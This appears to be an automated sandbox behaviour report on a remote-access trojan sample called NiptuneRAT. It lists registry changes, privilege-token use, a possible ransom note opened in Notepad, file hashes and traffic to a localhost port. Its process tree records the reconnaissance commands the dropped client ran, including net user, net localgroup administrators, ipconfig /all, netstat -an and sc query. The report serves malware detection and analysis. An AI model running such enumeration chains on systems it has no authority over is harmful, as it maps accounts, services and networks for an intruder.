Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "8" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0\MRUListEx = ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\system32\OpenWith.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1 C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0 = 6800310000000000715814ae10004e495054554e7e310000500009000400efbe715801ae715814ae2e000000dca70200000006000000000000000000000000000000796af6004e0069007000740075006e0065005200410054002d006d00610069006e00000018000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 020000000100000000000000ffffffff C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\MRUListEx = ffffffff C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0\NodeSlot = "4" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\NETSTAT.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3356 wrote to memory of 2976 N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe C:\Windows\SYSTEM32\cmd.exe
PID 3356 wrote to memory of 2976 N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe C:\Windows\SYSTEM32\cmd.exe
PID 2976 wrote to memory of 5060 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2976 wrote to memory of 5060 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2976 wrote to memory of 3936 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\HOSTNAME.EXE
PID 2976 wrote to memory of 3936 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\HOSTNAME.EXE
PID 2976 wrote to memory of 4984 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2976 wrote to memory of 4984 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 4984 wrote to memory of 4340 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4984 wrote to memory of 4340 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2976 wrote to memory of 2396 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2976 wrote to memory of 2396 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2396 wrote to memory of 5068 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2396 wrote to memory of 5068 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2976 wrote to memory of 3036 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2976 wrote to memory of 3036 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 3036 wrote to memory of 1068 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3036 wrote to memory of 1068 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2976 wrote to memory of 4820 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2976 wrote to memory of 4820 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 4820 wrote to memory of 756 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4820 wrote to memory of 756 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2976 wrote to memory of 2948 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2976 wrote to memory of 2948 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2948 wrote to memory of 112 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2948 wrote to memory of 112 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2976 wrote to memory of 1448 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2976 wrote to memory of 1448 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2976 wrote to memory of 944 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 2976 wrote to memory of 944 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 2976 wrote to memory of 696 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\ROUTE.EXE
PID 2976 wrote to memory of 696 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\ROUTE.EXE
PID 2976 wrote to memory of 3008 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\ARP.EXE
PID 2976 wrote to memory of 3008 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\ARP.EXE
PID 2976 wrote to memory of 1804 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\NETSTAT.EXE
PID 2976 wrote to memory of 1804 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\NETSTAT.EXE
PID 2976 wrote to memory of 4504 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 2976 wrote to memory of 4504 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 2976 wrote to memory of 1624 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\sc.exe
PID 2976 wrote to memory of 1624 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\sc.exe

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip"

C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe

"C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe"

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Users\Admin\Desktop\$77NiptuneClient.exe

"C:\Users\Admin\Desktop\$77NiptuneClient.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe"

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\HOSTNAME.EXE

hostname

C:\Windows\system32\net.exe

net user

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user

C:\Windows\system32\net.exe

net localgroup

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup

C:\Windows\system32\net.exe

net localgroup administrators

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup administrators

C:\Windows\system32\net.exe

net user guest

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user guest

C:\Windows\system32\net.exe

net user administrator

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user administrator

C:\Windows\system32\tasklist.exe

tasklist /svc

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\system32\ROUTE.EXE

route print

C:\Windows\system32\ARP.EXE

arp -a

C:\Windows\system32\NETSTAT.EXE

netstat -an

C:\Windows\system32\ipconfig.exe

ipconfig /displaydns

C:\Windows\system32\sc.exe

sc query type= service state= all

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\pp.anarh.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 104.193.132.51.in-addr.arpa udp
N/A 127.0.0.1:1337 tcp
N/A 127.0.0.1:1337 tcp
N/A 127.0.0.1:1337 tcp
N/A 127.0.0.1:1337 tcp

Files

C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe

MD5 e05e2846c2c4eb4c218634e28031122a
SHA1 daac3911d4aace4b6fcd5c6d5a2adb9950eacfd4
SHA256 178bda21d7735ee8bc2bfb74bc487055853a451ae741b1486fda96125be8e7c4
SHA512 181df2727abdaafb985a84588adac451b0d0031912a556a29b3e9071368022ff8119197a16171eaf43e5dfd42e9cb45c1801373a39907d8689fce40d1cc7ce39

C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe

MD5 c9b1ee4563ecf0789bab3fdc31c7c346
SHA1 370173eb922e0d3d2f1d2393ef2dac604a6abcca
SHA256 783ce12d604d80f75e89cb9b8da650fbd65890ba3ed6c4b1dde3045d0b713052
SHA512 aa78e096bfb4a8cc5ce7b30ad7fd639f2f1106b0402da8ea0941f211d909a4a17cd41b272452d602583ba0083216c1e4ac485d869b9facdd71c78153e21dc208

C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe.config

MD5 465c8716dc52edeaf09f0c61fc988934
SHA1 9cab6cec5f46d7528323fa2ad7aa2fc1a72d689b
SHA256 1c6051caeecdd3eeb78cad1b1efa60e56be4193d76f5718c73b8fdfcd61784c5
SHA512 0b386615940f254d6a7dd5650fc7da6544beab97d821bab8fe915dcc257729919142bbd6680b06a19f57c8c79c2c04368413fc31a7efef8e9248209f81c1cf3c

memory/3012-163-0x00007FFAE7E50000-0x00007FFAE8912000-memory.dmp

memory/3012-164-0x0000022223CD0000-0x00000222255FA000-memory.dmp

memory/3012-165-0x00000222274A0000-0x00000222274B0000-memory.dmp

memory/3012-166-0x000002223FB90000-0x000002223FDE2000-memory.dmp

memory/3012-167-0x0000022240200000-0x00000222403F4000-memory.dmp

memory/3012-168-0x0000022240780000-0x00000222408CE000-memory.dmp

memory/3012-169-0x0000022240910000-0x0000022240924000-memory.dmp

memory/3012-170-0x00000222274A0000-0x00000222274B0000-memory.dmp

memory/3012-171-0x0000022249C10000-0x000002224A1F8000-memory.dmp

memory/3012-172-0x00000222274A0000-0x00000222274B0000-memory.dmp

